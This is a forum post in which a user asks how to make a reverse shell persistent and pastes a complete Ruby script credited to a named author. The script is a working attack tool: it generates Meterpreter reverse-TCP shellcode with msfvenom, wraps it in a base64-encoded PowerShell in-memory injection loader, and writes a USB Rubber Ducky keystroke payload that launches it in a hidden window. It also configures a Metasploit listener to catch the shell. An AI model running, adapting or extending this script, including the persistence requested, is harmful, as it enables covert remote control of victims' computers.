poojam Posted March 29, 2015 Posted March 29, 2015 Hey fellas i came across this reverse shell made by (James Cook @b00stfr3ak44)i was just curous how can i change this to a Persistence reverse shell , its currenty a .rb file. you execute it in terminal , but i would like to know how to change it. #!/usr/bin/env ruby# Thanks to @mattifestation exploit-monday.com and Dave Kennedy.# Written by James Cook @b00stfr3ak44require 'base64'require 'readline'def print_error(text) print "\e[31m[-]\e[0m #{text}"enddef print_success(text) print "\e[32m[+]\e[0m #{text}"enddef print_info(text) print "\e[34m[*]\e[0m #{text}"enddef get_input(text) print "\e[33m[!]\e[0m #{text}"enddef rgets(prompt = '', default = '') choice = Readline.readline(prompt, false) choice == default if choice == '' choiceenddef select_host host_name = rgets('Enter the host ip to listen on: ') ip = host_name.split('.') if ip[0] == nil? || ip[1] == nil? || ip[2] == nil? || ip[3] == nil? print_error("Not a valid IP\n") select_host end print_success("Using #{host_name} as server\n") host_nameenddef select_port port = rgets('Port you would like to use or leave blank for [443]: ') if port == '' port = '443' print_success("Using #{port}\n") return port elsif !(1..65_535).cover?(port.to_i) print_error("Not a valid port\n") sleep(1) select_port else print_success("Using #{port}\n") return port endenddef shellcode_gen(msf_path, host, port) print_info("Generating shellcode\n") msf_command = "#{msf_path}./msfvenom --payload " msf_command << "#{@set_payload} LHOST=#{host} LPORT=#{port} -f c" execute = `#{msf_command}` shellcode = clean_shellcode(execute) powershell_command = powershell_string(shellcode) final = to_ps_base64(powershell_command) finalenddef clean_shellcode(shellcode) shellcode = shellcode.gsub('\\', ',0') shellcode = shellcode.delete('+') shellcode = shellcode.delete('"') shellcode = shellcode.delete("\n") shellcode = shellcode.delete("\s") shellcode[0..18] = '' shellcodeenddef to_ps_base64(command) Base64.encode64(command.split('').join("\x00") << "\x00").gsub!("\n", '')enddef powershell_string(shellcode) s = %($1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr ) s << 'VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, ' s << "uint flProtect);[DllImport(\"kernel32.dll\")]public static extern " s << 'IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, ' s << 'IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, ' s << "IntPtr lpThreadId);[DllImport(\"msvcrt.dll\")]public static extern " s << "IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type " s << %(-memberDefinition $c -Name "Win32" -namespace Win32Functions ) s << "-passthru;[byte[]];[byte[]]$sc = #{shellcode};$size = 0x1000;if " s << '($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::' s << 'VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);' s << '$i++) {$w::memset([intPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::' s << "CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = " s << '[system.Convert]::ToBase64String([system.Text.Encoding]::Unicode.' s << 'GetBytes($1));if([intPtr]::Size -eq 8){$x86 = $env:SystemRoot + ' s << %("\\syswow64\\WindowsPowerShell\\v1.0\\powershell";$cmd = "-nop -noni ) s << %(-enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& ) s << %(powershell $cmd $gq";})enddef ducky_setup(encoded_command) print_info("Writing to file\n") s = "DELAY 2000\nGUI r\nDELAY 500\nSTRING cmd\nENTER\nDELAY 500\n" s << "STRING powershell -nop -wind hidden -noni -enc #{encoded_command}\n" s << 'ENTER' File.open('powershell_reverse_ducky.txt', 'w') do |f| f.write(s) end print_success("File Complete\n")enddef metasploit_setup(msf_path, host, port) print_info("Setting up Metasploit this may take a moment\n") rc_file = 'msf_listener.rc' file = File.open("#{rc_file}", 'w') file.write("use exploit/multi/handler\n") file.write("set PAYLOAD #{@set_payload}\n") file.write("set LHOST #{host}\n") file.write("set LPORT #{port}\n") file.write("set EnableStageEncoding true\n") file.write("set ExitOnSession false\n") file.write('exploit -j') file.close system("#{msf_path}./msfconsole -r #{rc_file}")endbegin if File.exist?('/usr/bin/msfvenom') msf_path = '/usr/bin/' elsif File.exist?('/opt/metasploit-framework/msfvenom') msf_path = ('/opt/metasploit-framework/') else print_error('Metasploit Not Found!') exit end @set_payload = 'windows/meterpreter/reverse_tcp' host = select_host port = select_port encoded_command = shellcode_gen(msf_path, host, port) ducky_setup(encoded_command) msf_setup = rgets('Would you like to start the listener?[yes/no] ') print_info("Compile powershell_reverse_ducky.txt with duckencode.jar\n") metasploit_setup(msf_path, host, port) if msf_setup == 'yes' print_info("Good Bye!\n")end Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.